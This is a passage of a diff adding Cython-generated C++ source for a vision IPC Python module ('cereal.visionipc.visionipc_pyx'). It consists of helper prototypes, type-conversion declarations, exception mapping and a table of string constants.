__pyx_sub_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +#define __pyx_get_slice_count_pointer(memview) (&memview->acquisition_count) +#define __PYX_INC_MEMVIEW(slice, have_gil) __Pyx_INC_MEMVIEW(slice, have_gil, __LINE__) +#define __PYX_XCLEAR_MEMVIEW(slice, have_gil) __Pyx_XCLEAR_MEMVIEW(slice, have_gil, __LINE__) +static CYTHON_INLINE void __Pyx_INC_MEMVIEW(__Pyx_memviewslice *, int, int); +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *, int, int); + +/* TypeInfoToFormat.proto */ +struct __pyx_typeinfo_string { + char string[3]; +}; +static struct __pyx_typeinfo_string __Pyx_TypeInfoToFormat(__Pyx_TypeInfo *type); + +/* CIntFromPy.proto */ +static CYTHON_INLINE enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE uint32_t __Pyx_PyInt_As_uint32_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE uint64_t __Pyx_PyInt_As_uint64_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_npy_uint8(npy_uint8 value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE npy_uint8 __Pyx_PyInt_As_npy_uint8(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_unsigned_char(unsigned char value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint32_t(uint32_t value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint64_t(uint64_t value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_enum__VisionStreamType(enum VisionStreamType value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType value); + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self); /* proto*/ +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto*/ +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self); /* proto*/ +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self); /* proto*/ +static PyObject *__pyx_f_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_create(VisionBuf *__pyx_v_cbuf); /* proto*/ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "libcpp.utility" */ + +/* Module declarations from "libcpp.set" */ + +/* Module declarations from "libc.stdint" */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "cereal.visionipc.visionipc" */ + +/* Module declarations from "libc.stdio" */ + +/* Module declarations from "__builtin__" */ + +/* Module declarations from "cpython.type" */ + +/* Module declarations from "cpython" */ + +/* Module declarations from "cpython.object" */ + +/* Module declarations from "cpython.ref" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "cython.view" */ +static struct __pyx_array_obj *__pyx_array_new(PyObject *, Py_ssize_t, char *, char *, char *); /*proto*/ + +/* Module declarations from "cereal.visionipc.visionipc_pyx" */ +static PyObject *__Pyx_OrderedDict = 0; +static PyObject *__Pyx_EnumBase = 0; +static PyObject *__Pyx_FlagBase = 0; +static PyObject *__pyx_collections_abc_Sequence = 0; +static PyObject *generic = 0; +static PyObject *strided = 0; +static PyObject *indirect = 0; +static PyObject *contiguous = 0; +static PyObject *indirect_contiguous = 0; +static int __pyx_memoryview_thread_locks_used; +static PyThread_type_lock __pyx_memoryview_thread_locks[8]; +static PyObject *__Pyx_globals = 0; +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &); /*proto*/ +static PyObject *__pyx_convert_set_to_py_enum__VisionStreamType(std::set const &); /*proto*/ +static PyObject *__pyx_unpickle___Pyx_EnumMeta__set_state(struct __pyx_obj___Pyx_EnumMeta *, PyObject *); /*proto*/ +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *); /*proto*/ +static struct __pyx_array_obj *__pyx_array_new(PyObject *, Py_ssize_t, char *, char *, char *); /*proto*/ +static PyObject *__pyx_memoryview_new(PyObject *, int, int, __Pyx_TypeInfo *); /*proto*/ +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *); /*proto*/ +static PyObject *_unellipsify(PyObject *, int); /*proto*/ +static int assert_direct_dimensions(Py_ssize_t *, int); /*proto*/ +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *, PyObject *); /*proto*/ +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int, int); /*proto*/ +static char *__pyx_pybuffer_index(Py_buffer *, char *, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memslice_transpose(__Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice, int, PyObject *(*)(char *), int (*)(char *, PyObject *), int); /*proto*/ +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static Py_ssize_t abs_py_ssize_t(Py_ssize_t); /*proto*/ +static char __pyx_get_best_slice_order(__Pyx_memviewslice *, int); /*proto*/ +static void _copy_strided_to_strided(char *, Py_ssize_t *, char *, Py_ssize_t *, Py_ssize_t *, Py_ssize_t *, int, size_t); /*proto*/ +static void copy_strided_to_strided(__Pyx_memviewslice *, __Pyx_memviewslice *, int, size_t); /*proto*/ +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *, int); /*proto*/ +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *, Py_ssize_t *, Py_ssize_t, int, char); /*proto*/ +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *, __Pyx_memviewslice *, char, int); /*proto*/ +static int __pyx_memoryview_err_extents(int, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memoryview_err_dim(PyObject *, PyObject *, int); /*proto*/ +static int __pyx_memoryview_err(PyObject *, PyObject *); /*proto*/ +static int __pyx_memoryview_err_no_memory(void); /*proto*/ +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice, __Pyx_memviewslice, int, int, int); /*proto*/ +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *, int, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *, int, size_t, void *, int); /*proto*/ +static void __pyx_memoryview__slice_assign_scalar(char *, Py_ssize_t *, Py_ssize_t *, int, size_t, void *); /*proto*/ +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *, PyObject *); /*proto*/ +static PyObject *__pyx_format_from_typeinfo(__Pyx_TypeInfo *); /*proto*/ +/* #### Code section: typeinfo ### */ +static __Pyx_TypeInfo __Pyx_TypeInfo_nn___pyx_t_5numpy_uint8_t = { "uint8_t", NULL, sizeof(__pyx_t_5numpy_uint8_t), { 0 }, 0, __PYX_IS_UNSIGNED(__pyx_t_5numpy_uint8_t) ? 'U' : 'I', __PYX_IS_UNSIGNED(__pyx_t_5numpy_uint8_t), 0 }; +static __Pyx_TypeInfo __Pyx_TypeInfo_unsigned_char__const__ = { "const unsigned char", NULL, sizeof(unsigned char const ), { 0 }, 0, __PYX_IS_UNSIGNED(unsigned char const ) ? 'U' : 'I', __PYX_IS_UNSIGNED(unsigned char const ), 0 }; +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "cereal.visionipc.visionipc_pyx" +extern int __pyx_module_is_main_cereal__visionipc__visionipc_pyx; +int __pyx_module_is_main_cereal__visionipc__visionipc_pyx = 0; + +/* Implementation of "cereal.visionipc.visionipc_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_staticmethod; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin_AssertionError; +static PyObject *__pyx_builtin_ValueError; +static PyObject *__pyx_builtin___import__; +static PyObject *__pyx_builtin_MemoryError; +static PyObject *__pyx_builtin_enumerate; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_Ellipsis; +static PyObject *__pyx_builtin_id; +static PyObject *__pyx_builtin_IndexError; +static PyObject *__pyx_builtin_ImportError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = ""; +static const char __pyx_k_O[] = "O"; +static const char __pyx_k_T[] = "T{"; + static const char __pyx_k_c[] = "c"; + static const char __pyx_k_v[] = "v"; + static const char __pyx_k__3[] = "."; + static const char __pyx_k__4[] = ": "; + static const char __pyx_k__5[] = "*"; + static const char __pyx_k__8[] = "'"; + static const char __pyx_k__9[] = ")"; + static const char __pyx_k_gc[] = "gc"; + static const char __pyx_k_id[] = "id"; + static const char __pyx_k_np[] = "np"; + static const char __pyx_k_tp[] = "tp"; + static const char __pyx_k__11[] = "^"; + static const char __pyx_k__12[] = ":"; +static const char __pyx_k__13[] = "}"; +static const char __pyx_k__14[] = "("; +static const char __pyx_k__15[] = ","; +static const char __pyx_k__68[] = "?"; +static const char __pyx_k_abc[] = "abc"; +static const char __pyx_k_and[] = " and "; +static const char __pyx_k_buf[] = "buf"; +static const char __pyx_k_cls[] = "cls"; +static const char __pyx_k_dct[] = "dct"; +static const char __pyx_k_doc[] = "__doc__"; +static const char __pyx_k_get[] = "get"; +static const char __pyx_k_got[] = " (got "; +static const char __pyx_k_new[] = "__new__"; +static const char __pyx_k_obj[] = "obj"; +static const char __pyx_k_res[] = "res"; +static const char __pyx_k_rgb[] = "rgb"; +static const char __pyx_k_s_s[] = "%s.%s"; +static const char __pyx_k_str[] = "__str__"; +static const char __pyx_k_sys[] = "sys"; +static const char __pyx_k_base[] = "base"; +static const char __pyx_k_data[] = "data"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_enum[] = "enum"; +static const char __pyx_k_init[] = "__init__"; +static const char __pyx_k_join[] = "join"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_mode[] = "mode"; +static const char __pyx_k_name[] = "name"; +static const char __pyx_k_ndim[] = "ndim"; +static const char __pyx_k_pack[] = "pack"; +static const char __pyx_k_recv[] = "recv"; +static const char __pyx_k_repr[] = "__repr__"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_send[] = "send"; +static const char __pyx_k_size[] = "size"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_step[] = "step"; +static const char __pyx_k_stop[] = "stop"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_ASCII[] = "ASCII"; +static const char __pyx_k_block[] = "block"; +static const char __pyx_k_class[] = "__class__"; +static const char __pyx_k_count[] = "count"; +static const char __pyx_k_error[] = "error"; +static const char __pyx_k_extra[] = "extra"; +static const char __pyx_k_flags[] = "flags"; +static const char __pyx_k_index[] = "index"; +static const char __pyx_k_numpy[] = "numpy"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_s_s_d[] = "<%s.%s: %d>"; +static const char __pyx_k_shape[] = "shape"; +static const char __pyx_k_start[] = "start"; +static const char __pyx_k_state[] = "state"; +static const char __pyx_k_super[] = "super"; +static const char __pyx_k_value[] = "value"; +static const char __pyx_k_width[] = "width"; +static const char __pyx_k_dict_2[] = "_dict"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_encode[] = "encode"; +static const char __pyx_k_format[] = "format"; +static const char __pyx_k_height[] = "height"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_module[] = "__module__"; +static const char __pyx_k_name_2[] = "__name__"; +static const char __pyx_k_pickle[] = "pickle"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_stream[] = "stream"; +static const char __pyx_k_stride[] = "stride"; +static const char __pyx_k_struct[] = "struct"; +static const char __pyx_k_unpack[] = "unpack"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_values[] = "values"; +static const char __pyx_k_IntEnum[] = "IntEnum"; +static const char __pyx_k_IntFlag[] = "IntFlag"; +static const char __pyx_k_asarray[] = "asarray"; +static const char __pyx_k_connect[] = "connect"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_fortran[] = "fortran"; +static const char __pyx_k_members[] = "__members__"; +static const char __pyx_k_memview[] = "memview"; +static const char __pyx_k_parents[] = "parents"; +static const char __pyx_k_prepare[] = "__prepare__"; +static const char __pyx_k_Ellipsis[] = "Ellipsis"; +static const char __pyx_k_EnumBase[] = "EnumBase"; +static const char __pyx_k_EnumType[] = "EnumType"; +static const char __pyx_k_Sequence[] = "Sequence"; +static const char __pyx_k_blocking[] = "blocking"; +static const char __pyx_k_conflate[] = "conflate"; +static const char __pyx_k_frame_id[] = "frame_id"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_itemsize[] = "itemsize"; +static const char __pyx_k_module_2[] = "module"; +static const char __pyx_k_pyx_type[] = "__pyx_type"; +static const char __pyx_k_qualname[] = "__qualname__"; +static const char __pyx_k_register[] = "register"; +static const char __pyx_k_set_name[] = "__set_name__"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_VisionBuf[] = "VisionBuf"; +static const char __pyx_k_enumerate[] = "enumerate"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_metaclass[] = "__metaclass__"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_uv_offset[] = "uv_offset"; +static const char __pyx_k_IndexError[] = "IndexError"; +static const char __pyx_k_ValueError[] = "ValueError"; +static const char __pyx_k_pyx_result[] = "__pyx_result"; +static const char __pyx_k_pyx_vtable[] = "__pyx_vtable__"; +static const char __pyx_k_timeout_ms[] = "timeout_ms"; +static const char __pyx_k_ImportError[] = "ImportError"; +static const char __pyx_k_MemoryError[] = "MemoryError"; +static const char __pyx_k_OrderedDict[] = "OrderedDict"; +static const char __pyx_k_PickleError[] = "PickleError"; +static const char __pyx_k_collections[] = "collections"; +static const char __pyx_k_mro_entries[] = "__mro_entries__"; +static const char __pyx_k_num_buffers[] = "num_buffers"; +static const char __pyx_k_Pyx_EnumBase[] = "__Pyx_EnumBase"; +static const char __pyx_k_Pyx_FlagBase[] = "__Pyx_FlagBase"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_connected[] = "is_connected"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_member_names[] = "_member_names_"; +static const char __pyx_k_pyx_checksum[] = "__pyx_checksum"; +static const char __pyx_k_staticmethod[] = "staticmethod"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_use_setstate[] = "use_setstate"; +static const char __pyx_k_version_info[] = "version_info"; +static const char __pyx_k_class_getitem[] = "__class_getitem__"; +static const char __pyx_k_init_subclass[] = "__init_subclass__"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_timestamp_eof[] = "timestamp_eof"; +static const char __pyx_k_timestamp_sof[] = "timestamp_sof"; +static const char __pyx_k_AssertionError[] = "AssertionError"; +static const char __pyx_k_create_buffers[] = "create_buffers"; +static const char __pyx_k_start_listener[] = "start_listener"; +static const char __pyx_k_View_MemoryView[] = "View.MemoryView"; +static const char __pyx_k_VisionIpcClient[] = "VisionIpcClient"; +static const char __pyx_k_VisionIpcServer[] = "VisionIpcServer"; +static const char __pyx_k_allocate_buffer[] = "allocate_buffer"; +static const char __pyx_k_collections_abc[] = "collections.abc"; +static const char __pyx_k_dtype_is_object[] = "dtype_is_object"; +static const char __pyx_k_pyx_PickleError[] = "__pyx_PickleError"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_VisionStreamType[] = "VisionStreamType"; +static const char __pyx_k_VISION_STREAM_MAP[] = "VISION_STREAM_MAP"; +static const char __pyx_k_available_streams[] = "available_streams"; +static const char __pyx_k_get_endpoint_name[] = "get_endpoint_name"; +static const char __pyx_k_pyx_unpickle_Enum[] = "__pyx_unpickle_Enum"; +static const char __pyx_k_Pyx_EnumBase___new[] = "__Pyx_EnumBase.__new__"; +static const char __pyx_k_Pyx_EnumBase___str[] = "__Pyx_EnumBase.__str__"; +static const char __pyx_k_Pyx_FlagBase___new[] = "__Pyx_FlagBase.__new__"; +static const char __pyx_k_Pyx_FlagBase___str[] = "__Pyx_FlagBase.__str__"; +static const char __pyx_k_VISION_STREAM_ROAD[] = "VISION_STREAM_ROAD"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_strided_and_direct[] = ""; +static const char __pyx_k_Pyx_EnumBase___repr[] = "__Pyx_EnumBase.__repr__"; +static const char __pyx_k_Pyx_FlagBase___repr[] = "__Pyx_FlagBase.__repr__"; +static const char __pyx_k_Unknown_enum_value_s[] = "Unknown enum value: '%s'"; +static const char __pyx_k_VISION_STREAM_DRIVER[] = "VISION_STREAM_DRIVER"; +static const char __pyx_k_VisionIpcClient_recv[] = "VisionIpcClient.recv"; +static const char __pyx_k_VisionIpcServer_send[] = "VisionIpcServer.send"; +static const char __pyx_k_strided_and_indirect[] = ""; +static const char __pyx_k_Invalid_shape_in_axis[] = "Invalid shape in axis "; +static const char __pyx_k_contiguous_and_direct[] = ""; +static const char __pyx_k_Cannot_index_with_type[] = "Cannot index with type '"; +static const char __pyx_k_MemoryView_of_r_object[] = ""; +static const char __pyx_k_MemoryView_of_r_at_0x_x[] = ""; +static const char __pyx_k_VISION_STREAM_WIDE_ROAD[] = "VISION_STREAM_WIDE_ROAD"; +static const char __pyx_k_VisionIpcClient_connect[] = "VisionIpcClient.connect"; +static const char __pyx_k_contiguous_and_indirect[] = ""; +static const char __pyx_k_Dimension_d_is_not_direct[] = "Dimension %d is not direct"; +static const char __pyx_k_VisionBuf___reduce_cython[] = "VisionBuf.__reduce_cython__"; +static const char __pyx_k_create_buffers_with_sizes[] = "create_buffers_with_sizes"; +static const char __pyx_k_Index_out_of_bounds_axis_d[] = "Index out of bounds (axis %d)"; +static const char __pyx_k_Step_may_not_be_zero_axis_d[] = "Step may not be zero (axis %d)"; +static const char __pyx_k_VisionBuf___setstate_cython[] = "VisionBuf.__setstate_cython__"; +static const char __pyx_k_itemsize_0_for_cython_array[] = "itemsize <= 0 for cython.array"; +static const char __pyx_k_pyx_unpickle___Pyx_EnumMeta[] = "__pyx_unpickle___Pyx_EnumMeta"; +static const char __pyx_k_Pyx_EnumMeta___reduce_cython[] = "__Pyx_EnumMeta.__reduce_cython__"; +static const char __pyx_k_VisionIpcClient_is_connected[] = "VisionIpcClient.is_connected"; +static const char __pyx_k_unable_to_allocate_array_data[] = "unable to allocate array data."; +static const char __pyx_k_Pyx_EnumMeta___setstate_cython[] = "__Pyx_EnumMeta.__setstate_cython__"; +static const char __pyx_k_VisionIpcServer_create_buffers[] = "VisionIpcServer.create_buffers"; +static const char __pyx_k_VisionIpcServer_start_listener[] = "VisionIpcServer.start_listener"; +static const char __pyx_k_cereal_visionipc_visionipc_pyx[] = "cereal.visionipc.visionipc_pyx"; +static const char __pyx_k_strided_and_direct_or_indirect[] = ""; +static const char __pyx_k_VisionIpcClient___reduce_cython[] = "VisionIpcClient.__reduce_cython__"; +static const char __pyx_k_VisionIpcServer___reduce_cython[] = "VisionIpcServer.__reduce_cython__"; +static const char __pyx_k_numpy_core_multiarray_failed_to[] = "numpy.core.multiarray failed to import"; +static const char __pyx_k_self_buf_cannot_be_converted_to[] = "self.buf cannot be converted to a Python object for pickling"; +static const char __pyx_k_self_server_cannot_be_converted[] = "self.server cannot be converted to a Python object for pickling"; +static const char __pyx_k_All_dimensions_preceding_dimensi[] = "All dimensions preceding dimension %d must be indexed and not sliced"; +static const char __pyx_k_Buffer_view_does_not_expose_stri[] = "Buffer view does not expose strides"; +static const char __pyx_k_Can_only_create_a_buffer_that_is[] = "Can only create a buffer that is contiguous in memory."; +static const char __pyx_k_Cannot_assign_to_read_only_memor[] = "Cannot assign to read-only memoryview"; +static const char __pyx_k_Cannot_create_writable_memory_vi[] = "Cannot create writable memory view from read-only memoryview"; +static const char __pyx_k_Cannot_transpose_memoryview_with[] = "Cannot transpose memoryview with indirect dimensions"; +static const char __pyx_k_Empty_shape_tuple_for_cython_arr[] = "Empty shape tuple for cython.array"; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0[] = "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())"; +static const char __pyx_k_Indirect_dimensions_not_supporte[] = "Indirect dimensions not supported"; +static const char __pyx_k_Invalid_mode_expected_c_or_fortr[] = "Invalid mode, expected 'c' or 'fortran', got "; +static const char __pyx_k_Out_of_bounds_on_buffer_access_a[] = "Out of bounds on buffer access (axis "; +static const char __pyx_k_Unable_to_convert_item_to_object[] = "Unable to convert item to object"; +static const char __pyx_k_VisionIpcClient___setstate_cytho[] = "VisionIpcClient.__setstate_cython__"; +static const char __pyx_k_VisionIpcClient_available_stream[] = "VisionIpcClient.available_streams"; +static const char __pyx_k_VisionIpcServer___setstate_cytho[] = "VisionIpcServer.__setstate_cython__"; +static const char __pyx_k_VisionIpcServer_create_buffers_w[] = "VisionIpcServer.create_buffers_with_sizes"; +static const char __pyx_k_cereal_visionipc_visionipc_pyx_p[] = "cereal/visionipc/visionipc_pyx.pyx"; +static const char __pyx_k_got_differing_extents_in_dimensi[] = "got differing extents in dimension "; +static const char __pyx_k_no_default___reduce___due_to_non[] = "no default __reduce__ due to non-trivial __cinit__"; +static const char __pyx_k_numpy_core_umath_failed_to_impor[] = "numpy.core.umath failed to import"; +static const char __pyx_k_unable_to_allocate_shape_and_str[] = "unable to allocate shape and strides."; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0_2[] = "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))"; +/* #### Code section: decls ### */ +static int __pyx_pf_8EnumBase_14__Pyx_EnumMeta___init__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name, PyObject *__pyx_v_parents, PyObject *__pyx_v_dct); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_2__iter__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_4__getitem__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_6__reduce_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_8__setstate_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name); /* proto */ +static PyObject 